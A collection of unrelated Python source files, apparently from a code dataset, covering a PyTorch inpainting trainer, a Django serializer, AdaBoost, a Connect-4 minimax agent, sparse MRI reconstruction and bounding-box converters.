class TrainerForEdgeLineFinetune(TrainerForContinuousEdgeLine):
def __init__(self, model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger=None):
super().__init__(model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger)
def train(self, loaded_ckpt):
model, config = self.model, self.config
raw_model = model.module if hasattr(self.model, "module") else model
optimizer = raw_model.configure_optimizers(config)
if self.config.AMP: # use AMP
model, optimizer = amp.initialize(model, optimizer, num_losses=1, opt_level='O1')
previous_epoch = -1
bestAverageF1 = 0
if loaded_ckpt is not None:
optimizer.load_state_dict(loaded_ckpt['optimizer'])
self.iterations = loaded_ckpt['iterations']
bestAverageF1 = loaded_ckpt['best_validation']
previous_epoch = loaded_ckpt['epoch']
if self.global_rank == 0:
self.logger.info('Finished reloading the Epoch %d optimizer' % (loaded_ckpt['epoch']))
else:
if self.global_rank == 0:
self.logger.info(
'Warnning: There is no previous optimizer found. An initialized optimizer will be used.')
# TODO: Use different seeds to initialize each worker. (This issue is caused by the bug of pytorch itself)
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=config.batch_size // config.world_size, # BS of each GPU
num_workers=config.num_workers, sampler=self.train_sampler)
test_loader = DataLoader(self.test_dataset, shuffle=False, pin_memory=True,
batch_size=config.batch_size // config.world_size,
num_workers=config.num_workers)
if loaded_ckpt is None:
self.iterations = 0 # counter used for learning rate decay
for epoch in range(config.max_epochs):
if previous_epoch != -1 and epoch <= previous_epoch:
continue
if epoch == previous_epoch + 1 and self.global_rank == 0:
self.logger.info("Resume from Epoch %d" % (epoch))
self.train_sampler.set_epoch(epoch) ## Shuffle each epoch
epoch_start = time.time()
model.train()
loader = train_loader
losses = []
not_show_tqdm = True
for it, items in enumerate(tqdm(loader, disable=not_show_tqdm)):
# place data on the correct device
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
edge, line, loss = model(items['mask_img'], items['edge'], items['line'], items['edge'], items['line'],
items['erode_mask'])
loss = loss.mean() # collapse all losses if they are scattered on multiple gpus
losses.append(loss.item())
# backprop and update the parameters
self.iterations += 1 # number of iterations processed this step (i.e. label is not -100)
model.zero_grad()
if self.config.AMP:
with amp.scale_loss(loss, optimizer, loss_id=0) as loss_scaled:
loss_scaled.backward()
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), config.grad_norm_clip)
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), config.grad_norm_clip)
optimizer.step()
# decay the learning rate based on our progress
if config.lr_decay:
if self.iterations < config.warmup_iterations:
# linear warmup
lr_mult = float(self.iterations) / float(max(1, config.warmup_iterations))
else:
# cosine learning rate decay
progress = float(self.iterations - config.warmup_iterations) / float(
max(1, config.final_iterations - config.warmup_iterations))
lr_mult = max(0.1, 0.5 * (1.0 + math.cos(math.pi * progress)))
lr = config.learning_rate * lr_mult
for param_group in optimizer.param_groups:
param_group['lr'] = lr
else:
lr = config.learning_rate
if it % self.config.print_freq == 0 and self.global_rank == 0:
self.logger.info(
f"epoch {epoch + 1} iter {it}/{self.iterations_per_epoch}: train loss {loss.item():.5f}. lr {lr:e}")
if self.iterations % 2000 == 1 and self.global_rank == 0:
edge_output = edge[:4, :, :, :].squeeze(1).cpu()
edge_output = torch.cat(tuple(edge_output), dim=0)
line_output = line[:4, :, :, :].squeeze(1).cpu()
line_output = torch.cat(tuple(line_output), dim=0)
masked_edges = (items['edge'][:4, ...] * (1 - items['erode_mask'][:4, ...])).squeeze(1).cpu()
original_edge = items['edge'][:4, ...].squeeze(1).cpu()
masked_lines = (items['line'][:4, ...] * (1 - items['erode_mask'][:4, ...])).squeeze(1).cpu()
original_line = items['line'][:4, ...].squeeze(1).cpu()
masked_edges = torch.cat(tuple(masked_edges), dim=0)
original_edge = torch.cat(tuple(original_edge), dim=0)
masked_lines = torch.cat(tuple(masked_lines), dim=0)
original_line = torch.cat(tuple(original_line), dim=0)
output = torch.cat([original_edge.float(), original_line.float(), masked_edges.float(),
masked_lines.float(), edge_output.float(), line_output.float()],
dim=-1)[:, :, None].repeat(1, 1, 3)
output *= 255
output = output.detach().numpy().astype(np.uint8)
current_img = items['img'][:4, ...] * 0.5 + 0.5
current_img = current_img.permute(0, 2, 3, 1) * 255
original_img = np.concatenate(current_img.cpu().numpy().astype(np.uint8), axis=0)
mask = items['mask'][:4, ...].permute(0, 2, 3, 1)
current_img = (current_img * (1 - mask)).cpu().numpy().astype(np.uint8)
current_img = np.concatenate(current_img, axis=0)
output = np.concatenate([original_img, current_img, output], axis=1)
save_path = self.config.ckpt_path + '/samples'
os.makedirs(save_path, exist_ok=True)
cv2.imwrite(save_path + '/' + str(self.iterations) + '.jpg', output[:, :, ::-1])
# eval
model.eval()
edge_P, edge_R, edge_F1, line_P, line_R, line_F1 = self.val(model, test_loader)
model.train()
average_F1 = (edge_F1 + line_F1) / 2
self.logger.info("Epoch: %d, edge_P: %f, edge_R: %f, edge_F1: %f, line_P: %f, line_R: %f, "
"line_F1: %f, ave_F1: %f time for 2k iter: %d seconds" %
(epoch, edge_P, edge_R, edge_F1, line_P, line_R, line_F1, average_F1,
time.time() - epoch_start))
# supports early stopping based on the test loss, or just save always if no test set is provided
good_model = self.test_dataset is None or average_F1 >= bestAverageF1
if self.config.ckpt_path is not None and good_model and self.global_rank == 0: ## Validation on the global_rank==0 process
bestAverageF1 = average_F1
EdgeF1 = edge_F1
LineF1 = line_F1
self.logger.info("current best epoch is %d" % (epoch))
self.save_checkpoint(epoch, optimizer, self.iterations, bestAverageF1, EdgeF1, LineF1,
save_name='best')
self.save_checkpoint(epoch, optimizer, self.iterations, average_F1, edge_F1, line_F1,
save_name='latest')
def val(self, model, dataloader):
edge_precisions, edge_recalls, edge_f1s = [], [], []
line_precisions, line_recalls, line_f1s = [], [], []
for it, items in enumerate(tqdm(dataloader, disable=False)):
# place data on the correct device
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
with torch.no_grad():
edge, line, _ = model(items['mask_img'], items['edge'], items['line'], masks=items['erode_mask'])
edge_preds = edge
line_preds = line
precision, recall, f1 = self.metric(items['edge'] * items['erode_mask'], edge_preds * items['erode_mask'])
edge_precisions.append(precision.item())
edge_recalls.append(recall.item())
edge_f1s.append(f1.item())
precision, recall, f1 = self.metric(items['line'] * items['erode_mask'], line_preds * items['erode_mask'])
line_precisions.append(precision.item())
line_recalls.append(recall.item())
line_f1s.append(f1.item())
return float(np.mean(edge_precisions)), float(np.mean(edge_recalls)), float(np.mean(edge_f1s)), \
float(np.mean(line_precisions)), float(np.mean(line_recalls)), float(np.mean(line_f1s))
| StarcoderdataPython |
3309033 | from stockpricer.model import Pricer | StarcoderdataPython |
20451 | <reponame>major-hub/soil_app
from rest_framework import serializers
from user.models import User
from main.exceptions.user_exceptions import UserException
user_exception = UserException
class UserRegisterSerializer(serializers.ModelSerializer):
password_confirmation = serializers.CharField(max_length=128)
class Meta:
model = User
fields = ['email', 'phone_number', 'first_name', 'last_name', 'password', 'password_confirmation']
def validate(self, attrs):
password_confirmation = attrs.pop('password_confirmation')
if password_confirmation != attrs.get('password'):
raise serializers.ValidationError({'non_field_errors': user_exception("NOT_MATCHED_PASSWORDS").message})
return attrs
class UserLoginSerializer(serializers.Serializer):
email = serializers.EmailField(max_length=255)
password = serializers.CharField(max_length=128)
| StarcoderdataPython |
4835941 | <reponame>byanofsky/simple-blog
from google.appengine.datastore.datastore_query import Cursor
from handlers.basehandler import BaseHandler
from models.post import Post
class FrontPageHandler(BaseHandler):
def get(self):
# Constant for how many posts to display per page
POSTS_PER_PAGE = 10
# TODO: can we move cursor to post? to reduce imports?
cursor = Cursor(urlsafe=self.request.get('cursor'))
posts, next_cursor, more = Post.get_n_posts(
n=POSTS_PER_PAGE,
cursor=cursor
)
# TODO: code for building multi-page frontpage
# next cursor to ouput to url
# next_cursor.urlsafe()
self.render('frontpage.html', posts=posts)
| StarcoderdataPython |
4840542 | import numpy as np
#简单数据集上应用adaBoosting
def loadSimpData():
'''
创建简单数据集
'''
dataMat = np.matrix([[1., 2.1],
[2., 1.1],
[1.3, 1 ],
[1. , 1.],
[2. , 1.]])
classLabels = [1.0, 1.0, -1.0, -1.0, 1.0]
return dataMat, classLabels
def stumpClassify(dataMatrix, dimen, threshVal, threshIneq):
'''
使用单层决策树进行分类
'''
retArray = np.ones((np.shape(dataMatrix)[0], 1))
if threshIneq == 'lt':
#<=阈值 预测为-1了类
retArray[dataMatrix[:, dimen] <= threshVal] = -1.0
else:
#>阈值 预测为-1类
retArray[dataMatrix[:, dimen] > threshVal] = -1.0
return retArray
def buildStump(dataArr, classLabels, D):
'''
单层决策树算法
'''
dataMatrix = np.mat(dataArr)
labelMat = np.mat(classLabels).T
m, n = np.shape(dataMatrix)
#用于确定连续值步长的划分
numSteps = 10.0
bestStump = {}
#预测结果
bestClasEst = np.mat(np.zeros((m, 1)))
minError = float('inf')
#遍历属性,选择最优的属性进行划分
for i in range(n):
rangeMin = dataMatrix[:,i].min()
rangeMax = dataMatrix[:,i].max()
#将连续的属性值离散化
stepSize = (rangeMax - rangeMin) / numSteps
for j in range (-1, int(numSteps)+1):
for inequal in ['lt', 'gt']:
threshVal = (rangeMin + float(j)*stepSize)
predictedVals = stumpClassify(dataMatrix, i, threshVal, inequal)
errArr = np.mat(np.ones((m ,1)))
#分类正确的置为0
errArr[predictedVals == labelMat] = 0
#基于权重的误差 1
weightedError = D.T * errArr
# print('split: dim %d, thresh %.2f, thresh inequal: %s, the weighted error is %.3f' %(i, threshVal, inequal, weightedError))
if weightedError < minError:
minError = weightedError
bestClasEst = predictedVals.copy()
bestStump['dim'] = i
bestStump['thresh'] = threshVal
bestStump['ineq'] = inequal
return bestStump, minError, bestClasEst
def adaBoostTrainDS(dataArr, classLabels, numIt=40):
#保存训练的所有弱分类器
weakClassArr = []
m = np.shape(dataArr)[0]
#初始化样本权重 m,1
D = np.mat(np.ones((m,1)) / m)
#记录每个数据的类别估计累计值
aggClassEst = np.mat(np.zeros((m,1)))
for i in range(numIt):
# print('iter: ', i)
bestStump, error, classEst = buildStump(dataArr, classLabels, D)
# print('D: ', D.T)
#计算弱分类器的权重
alpha = float(0.5*np.log((1.0-error)/max(error, 1e-16)))
bestStump['alpha'] = alpha
weakClassArr.append(bestStump)
# print('classEst: ', classEst.T)
expon = np.multiply(-1*alpha*np.mat(classLabels).T, classEst)
D = np.multiply(D, np.exp(expon))
D = D / D.sum()
#带权重的预测结果
aggClassEst += alpha*classEst
# print('aggClassEst: ', aggClassEst.T)
aggErrors = np.multiply(np.sign(aggClassEst) != np.mat(classLabels).T, np.ones((m,1)))
errorRate = aggErrors.sum() / m
# print('total error: ', errorRate)
if errorRate == 0:
break
return weakClassArr
def adaClassify(dataToClass, classifierArr):
'''
使用adaboosting进行预测
'''
dataMatrix = np.mat(dataToClass)
m = np.shape(dataMatrix)[0]
#基于权重的累计预测结果
aggClassEst = np.mat(np.zeros((m,1)))
for i in range(len(classifierArr)):
classEst = stumpClassify(dataMatrix, classifierArr[i]['dim'], classifierArr[i]['thresh'], classifierArr[i]['ineq'])
aggClassEst += classifierArr[i]['alpha'] * classEst
# print('prediect result: ', aggClassEst)
#np.sign(input) 返回与input大小相同的output,且正数=1,0=0,负数=-1
return np.sign(aggClassEst)
#在复杂数据集上应用adaBoosting
def loadDataSet(filename):
'''
加载filename
'''
#获取filename中的总行数
numFeat = len(open(filename).readline().split('\t'))
dataMat = []
labelMat = []
fr = open(filename)
for line in fr.readlines():
lineArr = []
curLine = line.strip().split('\t')
for i in range(numFeat-1):
lineArr.append(float(curLine[i]))
dataMat.append(lineArr)
labelMat.append(float(curLine[-1]))
return dataMat, labelMat
def testAdaBoostingOnHardDataset(trainFilename, testFilename, numIt=40):
'''
在负载数据集上测试adaboosting
'''
dataArr, labelArr = loadDataSet(trainFilename)
#获取n个弱分类器
classifierArray = adaBoostTrainDS(dataArr, labelArr, numIt)
testArr, testLabelArr = loadDataSet(testFilename)
#获取测试结果
predictionnumIt = adaClassify(testArr, classifierArray)
errArr = np.mat(np.ones((len(testArr), 1)))
errorRateNum = errArr[predictionnumIt != np.mat(testLabelArr).T].sum()
errorRate = errorRateNum / len(testArr)
#保留两位小数并返回
return round(errorRate, 2)
if __name__ == '__main__':
# dataMat, classLabels = loadSimpData()
# D = np.mat(np.ones((5, 1))/5)
# bestStump, minError, bestClasEst = buildStump(dataMat, classLabels, D)
# print(bestStump, minError, bestClasEst)
# classifierArray = adaBoostTrainDS(dataMat, classLabels, 9)
# print(classifierArray)
# classifyRes = adaClassify([0,0], classifierArray)
# print(classifyRes)
#复杂数据集
errorRate = testAdaBoostingOnHardDataset('horseColicTraining2.txt', 'horseColicTest2.txt', 50)
print(errorRate) | StarcoderdataPython |
1634697 | <reponame>Melca-G/Aeolus
from pyrevit.framework import List
from pyrevit import revit, DB
import clr
clr.AddReference('RevitAPI')
clr.AddReference('RevitAPIUI')
# clr.AddReference("System.Windows.Form")
from Autodesk.Revit.DB import FilteredElementCollector, FilteredWorksetCollector, RevitLinkType,BuiltInParameter,\
Workset,WorksetKind
from Autodesk.Revit.DB import BuiltInCategory, ElementId, XYZ, Point, Transform, Transaction,FamilySymbol
from System.Collections.Generic import List
from pyrevit import script
from pyrevit import forms
import pyrevit
clr.AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
from System.Windows.Forms import Application, SendKeys
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
__doc__ = 'Get all parameters of the selected element.'
def get_selected_elements(doc):
"""API change in Revit 2016 makes old method throw an error"""
try:
# Revit 2016
return [doc.GetElement(id)
for id in __revit__.ActiveUIDocument.Selection.GetElementIds()]
except:
# old method
return list(__revit__.ActiveUIDocument.Selection.Elements)
selection = get_selected_elements(doc)
print(selection)
# convenience variable for first element in selection
if len(selection):
s0 = selection[0]
def get_all_parameters(element):
parameters = element.Parameters
_param = []
for param in parameters:
if param:
name = param.Definition.Name
if 'String' in str(param.StorageType):
try:
_param.append(name + ': ' + str(param.AsString()))
except:
_param.append(name + ': '+ str(param.AsValueString()))
elif 'Integer' in str(param.StorageType):
_param.append(name + ': ' + str(param.AsInteger()))
elif 'Double' in str(param.StorageType):
_param.append(name + ': ' + str(param.AsDouble()))
elif 'ElementId' in str(param.StorageType):
_param.append(name + ': '+ str(param.AsElementId().IntegerValue))
return _param
for i in get_all_parameters(selection[0]):
print(i)
| StarcoderdataPython |
1642601 | <reponame>smoosavioon/saeedconnect4<filename>agents/agent_minimax/minimax.py
import numpy as np
from agents.common import PlayerAction, BoardPiece, SavedState, GenMove, GameState, connected_four, PLAYER1, PLAYER2, apply_player_action, check_end_state
import math
from typing import Optional, Callable, Tuple
def evaluate_window(window: np.array, player: BoardPiece) -> np.float:
W = list(window)
score = 0
opp_player = PLAYER2
if player == PLAYER2:
opp_player = PLAYER1
if W.count(player) == 4:
score += 100
elif W.count(player) == 3 and W.count(0) == 1:
score += 5
elif W.count(player) == 2 and W.count(0) == 2:
score += 2
if W.count(opp_player) == 3 and W.count(0) == 1:
score -= 4
return score
def score_position(board: np.ndarray, player: BoardPiece) -> np.float:
score = 0
center_column = list(board[:,3])
center_count = center_column.count(player)
score += center_count * 3
## Score Horizontal
for r in range(6):
row_array = board[r, :]
for c in range(4):
window = row_array[c:c+4]
score += evaluate_window(window, player)
# Score Vertical
for c in range(7):
col_array = board[:, c]
for r in range(3):
window = col_array[r:r+4]
score += evaluate_window(window, player)
# Score posiive sloped diagonal
for r in range(3):
for c in range(4):
window = [board[r+i][c+i] for i in range(4)]
score += evaluate_window(window, player)
for r in range(3):
for c in range(4):
window = [board[r+3-i][c+i] for i in range(4)]
score += evaluate_window(window, player)
return score
def alpha_beta(
board: np.ndarray, player: BoardPiece, depth: np.int, alpha: np.float, beta: np.float, maximizingPlayer: bool
) -> Tuple[PlayerAction, np.float]:
# Choose a valid, non-full column randomly and return it as `action`
valid_columns = np.where(board[-1, :] == 0)[0]
opp_player = PLAYER2 if player == PLAYER1 else PLAYER1
game_state = check_end_state(board, opp_player if maximizingPlayer else player)
if depth == 0 or game_state in (GameState.IS_DRAW, GameState.IS_WIN):
if game_state == GameState.IS_WIN:
if maximizingPlayer:
return PlayerAction(-1), -1000000000000
else:
return PlayerAction(-1), 1000000000000
elif game_state == GameState.IS_DRAW:
return PlayerAction(np.random.choice(np.array(valid_columns).flatten(), 1)), 0
else: # depth = 0
return PlayerAction(np.random.choice(np.array(valid_columns).flatten(), 1)), score_position(board, player)
if maximizingPlayer:
value = -math.inf
column = np.random.choice(np.array(valid_columns).flatten(), 1)
for col in valid_columns:
# board_copy = board.copy()
new_board = apply_player_action(board, PlayerAction(col), player, True)
new_score = alpha_beta(new_board, opp_player, depth - 1, alpha, beta, False)[1]
if new_score > value:
value = new_score
column = col
alpha = max(alpha, value)
if alpha >= beta:
break
return PlayerAction(column), value
else: # Minimizing player
value = math.inf
column = np.random.choice(np.array(valid_columns).flatten(), 1)
for col in valid_columns:
# board_copy = board.copy()
new_board = apply_player_action(board, PlayerAction(col), player, True)
new_score = alpha_beta(new_board, opp_player, depth - 1, alpha, beta, True)[1]
if new_score < value:
value = new_score
column = col
beta = min(beta, value)
if alpha >= beta:
break
return PlayerAction(column), value
def generate_move_minimax(
board: np.ndarray, _player: BoardPiece, saved_state: Optional[SavedState]
) -> Tuple[PlayerAction, SavedState]:
# Choose a valid, non-full column randomly and return it as `action`
depth = 4
alpha = -math.inf
beta = math.inf
maximizingPlayer = True
action = alpha_beta(board, _player, depth, alpha, beta, maximizingPlayer)[0]
return PlayerAction(action), saved_state
| StarcoderdataPython |
1699634 | <reponame>hanaecarrie/pisap
##########################################################################
# XXX - Copyright (C) XXX, 2017
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
from __future__ import print_function
import numpy as np
import copy
# Package import
from ..base.image import Image
from ..stats import sigma_mad
from .linear import Identity
from .proximity import SoftThreshold
from .proximity import Positive
from .optimization import CondatVu
from .optimization import FISTA
from .cost import SynthesisCost, AnalysisCost, DualGapCost
from .reweight import cwbReweight
from .reweight import mReweight
from .noise import sigma_mad_sparse
def sparse_rec_condat_vu(
data, gradient_cls, gradient_kwargs, linear_cls, linear_kwargs,
std_est=None, std_est_method=None, std_thr=2.,
mu=1.0e-6, tau=None, sigma=None, relaxation_factor=1.0,
nb_of_reweights=1, max_nb_of_iter=150, add_positivity=False, atol=1e-4,
metric_call_period=5, metrics={}, verbose=0):
""" The Condat-Vu sparse reconstruction with reweightings.
Parameters
----------
data: ndarray
the data to reconstruct: observation are expected in Fourier space.
gradient_cls: class
a derived 'GradBase' class.
gradient_kwargs: dict
the 'gradient_cls' parameters, the first parameter is the data to
be reconstructed.
linear_cls: class
a linear operator class.
linear_kwargs: dict
the 'linear_cls' parameters.
std_est: float (optional, default None)
the noise std estimate.
If None use the MAD as a consistent estimator for the std.
std_est_method: str (optional, default None)
if the standard deviation is not set, estimate this parameter using
the mad routine in the image ('image') or in the sparse wavelet
decomposition ('sparse') domain. The sparse strategy is computed
at each iteration on the residuals.
std_thr: float (optional, default 2.)
use this trehold ewpressed as a number of sigme in the dual
proximity operator during the thresholding.
mu: float (optional, default 1.0e-6)
regularization hyperparameter
tau, sigma: float (optional, default None)
parameters of the Condat-Vu proximal-dual splitting algorithm.
If None estimates these parameters.
relaxation_factor: float (optional, default 0.5)
parameter of the Condat-Vu proximal-dual splitting algorithm.
If 1, no relaxation.
nb_of_reweights: int (optional, default 1)
the number of reweightings.
max_nb_of_iter: int (optional, default 150)
the maximum number of iterations in the Condat-Vu proximal-dual
splitting algorithm.
add_positivity: bool (optional, default False)
by setting this option, set the proximity operator to identity or
positive.
atol: float (optional, default 1e-4)
tolerance threshold for convergence.
metric_call_period: int (default is 5)
the period on which the metrics are compute.
metrics: dict, {'metric_name': [metric, if_early_stooping],} (optional)
the list of desired convergence metrics.
verbose: int (optional, default 0)
the verbosity level.
Returns
-------
x_final: Image
the estimated Condat-Vu primal solution.
y_final: DictionaryBase
the estimated Condat-Vu dual solution.
"""
if verbose > 0:
print("Starting Condat-Vu primal-dual algorithm.")
# Check input parameters
if std_est_method not in (None, "image", "sparse"):
raise ValueError("Unrecognize std estimation method "
"'{0}'.".format(std_est_method))
# Define the gradient operator
grad_op = gradient_cls(data, **gradient_kwargs)
# Define the linear operator
linear_op = linear_cls(**linear_kwargs)
img_shape = grad_op.ft_cls.img_shape
# Define the weights used during the thresholding in the dual domain
if std_est_method == "image":
# Define the noise std estimate in the image domain
if std_est is None:
std_est = sigma_mad(grad_op.MtX(data))
weights = linear_op.op(np.zeros(data.shape))
weights[...] = std_thr * std_est
reweight_op = cwbReweight(weights, wtype=std_est_method)
prox_dual_op = SoftThreshold(reweight_op.weights)
extra_factor_update = sigma_mad_sparse
elif std_est_method == "sparse":
# Define the noise std estimate in the image domain
if std_est is None:
std_est = 1.0
weights = linear_op.op(np.zeros(data.shape))
weights[...] = std_thr * std_est
reweight_op = mReweight(weights, wtype=std_est_method,
thresh_factor=std_thr)
prox_dual_op = SoftThreshold(reweight_op.weights)
extra_factor_update = sigma_mad_sparse
elif std_est_method is None:
# manual regularization mode
levels = linear_op.op(np.zeros(img_shape))
levels[...] = mu
prox_dual_op = SoftThreshold(levels)
extra_factor_update = None
nb_of_reweights = 0
# Define the Condat Vu optimizer: define the tau and sigma in the
# Condat-Vu proximal-dual splitting algorithm if not already provided.
# Check also that the combination of values will lead to convergence.
norm = linear_op.l2norm(img_shape)
lipschitz_cst = grad_op.spec_rad
if sigma is None:
sigma = 0.5
if tau is None:
# to avoid numerics troubles with the convergence bound
eps = 1.0e-8
# due to the convergence bound
tau = 1.0 / (lipschitz_cst/2 + sigma * norm**2 + eps)
convergence_test = (
1.0 / tau - sigma * norm ** 2 >= lipschitz_cst / 2.0)
if verbose > 0:
print(" - mu: ", mu)
print(" - lipschitz_cst: ", lipschitz_cst)
print(" - tau: ", tau)
print(" - sigma: ", sigma)
print(" - rho: ", relaxation_factor)
print(" - std: ", std_est)
print(" - 1/tau - sigma||L||^2 >= beta/2: ", convergence_test)
print("-" * 20)
# Define initial primal and dual solutions
primal = np.zeros(img_shape, dtype=np.complex)
dual = linear_op.op(primal)
dual[...] = 0.0
# Define the proximity operator
if add_positivity:
prox_op = Positive()
else:
prox_op = Identity()
# by default add the lasso cost metric
lasso = AnalysisCost(data, grad_op, linear_op, mu)
lasso_cost = {'lasso':{'metric':lasso,
'mapping': {'x_new': 'x', 'y_new':None},
'cst_kwargs':{},
'early_stopping': False}}
metrics.update(lasso_cost)
# by default add the dual-gap cost metric
dual_gap = DualGapCost(linear_op)
dual_gap_cost = {'dual_gap':{'metric':dual_gap,
'mapping': {'x_new': 'x', 'y_new':'y'},
'cst_kwargs':{},
'early_stopping': False}}
metrics.update(dual_gap_cost)
# Define the Condat-Vu optimization method
opt = CondatVu(x=primal, y=dual, grad=grad_op, prox=prox_op,
prox_dual=prox_dual_op, linear=linear_op, sigma=sigma,
tau=tau, rho=relaxation_factor, rho_update=None,
sigma_update=None, tau_update=None, extra_factor=1.0,
extra_factor_update=extra_factor_update,
metric_call_period=metric_call_period, metrics=metrics)
# Perform the first reconstruction
opt.iterate(max_iter=max_nb_of_iter)
# Perform reconstruction with reweightings
# Loop through number of reweightings
for reweight_index in range(nb_of_reweights):
# Welcome message
if verbose > 0:
print("-" * 10)
print(" - Reweight: ", reweight_index + 1)
print("-" * 10)
# Generate the new weights following reweighting prescription
if std_est_method == "image":
reweight_op.reweight(linear_op.op(opt.x_new))
else:
std_est = multiscale_sigma_mad(grad_op, linear_op)
reweight_op.reweight(std_est, linear_op.op(opt.x_new))
# Update the weights in the dual proximity operator
prox_dual_op.update_weights(reweight_op.weights)
# Update the weights in the cost function
cost_op.update_weights(reweight_op.weights)
# Perform optimisation with new weights
opt.iterate(max_iter=max_nb_of_iter)
linear_op.set_coeff(opt.y_final)
return Image(data=opt.x_final), linear_op, opt.metrics
#XXX linear_op.transform -> linear_op for DL
def sparse_rec_fista(
data, gradient_cls, gradient_kwargs, linear_cls, linear_kwargs,
mu, lambda_init=1.0, max_nb_of_iter=300, atol=1e-4,
metric_call_period=5, metrics={}, verbose=0):
""" The Condat-Vu sparse reconstruction with reweightings.
Parameters
----------
data: ndarray
the data to reconstruct: observation are expected in Fourier space.
gradient_cls: class
a derived 'GradBase' class.
gradient_kwargs: dict
the 'gradient_cls' parameters, the first parameter is the data to
be reconstructed.
linear_cls: class
a linear operator class.
linear_kwargs: dict
the 'linear_cls' parameters.
mu: float
coefficient of regularization.
lambda_init: float, (default 1.0)
initial value for the FISTA step.
max_nb_of_iter: int (optional, default 300)
the maximum number of iterations in the Condat-Vu proximal-dual
splitting algorithm.
atol: float (optional, default 1e-4)
tolerance threshold for convergence.
metric_call_period: int (default is 5)
the period on which the metrics are compute.
metrics: dict, {'metric_name': [metric, if_early_stooping],} (optional)
the list of desired convergence metrics.
verbose: int (optional, default 0)
the verbosity level.
Returns
-------
x_final: Image,
the estimated FISTA solution.
y_final: Dictionary,
the dictionary transformation estimated FISTA solution
metrics_list: list of Dict,
the convergence metrics
"""
if verbose > 0:
print("Starting FISTA reconstruction algorithm.")
# Define the linear operator
linear_op = linear_cls(**linear_kwargs)
# Define the gradient operator
gradient_kwargs["linear_cls"] = linear_op
grad_op = gradient_cls(data, **gradient_kwargs)
lipschitz_cst = grad_op.spec_rad
if verbose > 0:
print(" - mu: ", mu)
print(" - lipschitz_cst: ", lipschitz_cst)
print("-" * 20)
# Define initial primal and dual solutions
shape = grad_op.ft_cls.img_shape
x_init = np.zeros(shape, dtype=np.complex)
alpha = linear_op.op(x_init)
alpha[...] = 0.0
# Define the proximity dual operator
weights = copy.deepcopy(alpha)
weights[...] = mu
prox_op = SoftThreshold(weights)
# by default add the lasso cost metric
lasso = SynthesisCost(data, grad_op, mu)
lasso_cost = {'lasso': {'metric':lasso,
'mapping': {'x_new': None, 'y_new':'x'},
'cst_kwargs':{},
'early_stopping': False}}
metrics.update(lasso_cost)
opt = FISTA(x=alpha, grad=grad_op, prox=prox_op,
metric_call_period=metric_call_period, metrics=metrics)
# Perform the reconstruction
opt.iterate(max_iter=max_nb_of_iter)
linear_op.transform.analysis_data = opt.y_final
return Image(data=opt.x_final), linear_op.transform, opt.metrics
| StarcoderdataPython |
76365 | EXPECTED_SECRETS = [
"EQ_SERVER_SIDE_STORAGE_USER_ID_SALT",
"EQ_SERVER_SIDE_STORAGE_USER_IK_SALT",
"EQ_SERVER_SIDE_STORAGE_ENCRYPTION_USER_PEPPER",
"EQ_SECRET_KEY",
"EQ_RABBITMQ_USERNAME",
"EQ_RABBITMQ_PASSWORD",
]
def validate_required_secrets(secrets):
for required_secret in EXPECTED_SECRETS:
if required_secret not in secrets["secrets"]:
raise Exception("Missing Secret [{}]".format(required_secret))
class SecretStore:
def __init__(self, secrets):
self.secrets = secrets.get("secrets", {})
def get_secret_by_name(self, secret_name):
return self.secrets.get(secret_name)
| StarcoderdataPython |
190193 | <gh_stars>10-100
from numba import jit
import cv2
import numpy as np
import random
__all__ = ['coco2yolo', 'yolo2coco', 'voc2coco', 'coco2voc', 'yolo2voc', 'voc2yolo',
'bbox_iou', 'draw_bboxes', 'load_image']
@jit(nopython=True)
def voc2yolo(bboxes, height=720, width=1280):
"""
voc => [x1, y1, x2, y1]
yolo => [xmid, ymid, w, h] (normalized)
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
bboxes[..., 0::2] /= width
bboxes[..., 1::2] /= height
bboxes[..., 2] -= bboxes[..., 0]
bboxes[..., 3] -= bboxes[..., 1]
bboxes[..., 0] += bboxes[..., 2]/2
bboxes[..., 1] += bboxes[..., 3]/2
return bboxes
@jit(nopython=True)
def yolo2voc(bboxes, height=720, width=1280):
"""
yolo => [xmid, ymid, w, h] (normalized)
voc => [x1, y1, x2, y1]
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
bboxes[..., 0::2] *= width
bboxes[..., 1::2] *= height
bboxes[..., 0:2] -= bboxes[..., 2:4]/2
bboxes[..., 2:4] += bboxes[..., 0:2]
return bboxes
@jit(nopython=True)
def coco2yolo(bboxes, height=720, width=1280):
"""
coco => [xmin, ymin, w, h]
yolo => [xmid, ymid, w, h] (normalized)
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
# normolizinig
bboxes[..., 0::2] /= width
bboxes[..., 1::2] /= height
# converstion (xmin, ymin) => (xmid, ymid)
bboxes[..., 0:2] += bboxes[..., 2:4]/2
return bboxes
@jit(nopython=True)
def yolo2coco(bboxes, height=720, width=1280):
"""
yolo => [xmid, ymid, w, h] (normalized)
coco => [xmin, ymin, w, h]
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
# denormalizing
bboxes[..., 0::2] *= width
bboxes[..., 1::2] *= height
# converstion (xmid, ymid) => (xmin, ymin)
bboxes[..., 0:2] -= bboxes[..., 2:4]/2
return bboxes
@jit(nopython=True)
def voc2coco(bboxes, height=720, width=1280):
"""
voc => [xmin, ymin, xmax, ymax]
coco => [xmin, ymin, w, h]
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
# converstion (xmax, ymax) => (w, h)
bboxes[..., 2:4] -= bboxes[..., 0:2]
return bboxes
@jit(nopython=True)
